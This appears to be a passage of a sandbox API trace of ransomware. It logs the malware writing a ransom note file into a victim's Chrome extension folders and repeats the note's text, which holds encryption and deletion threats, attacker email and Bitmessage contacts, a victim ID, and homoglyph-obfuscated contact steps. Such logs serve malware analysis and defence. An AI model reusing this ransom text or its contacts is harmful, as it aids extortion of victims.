s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nSë\x91W[d¼\"òÈF\x17þê\x89|ó¢kö\x97pcÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0284.837] WriteFile (in: hFile=0x2ec, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0284.837] CloseHandle (hObject=0x2ec) returned 1 [0284.837] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\#readme_eman#.rtf")) returned 0xffffffff [0284.837] GetLastError () returned 0x2 [0284.837] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0284.838] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0284.838] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0284.838] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles 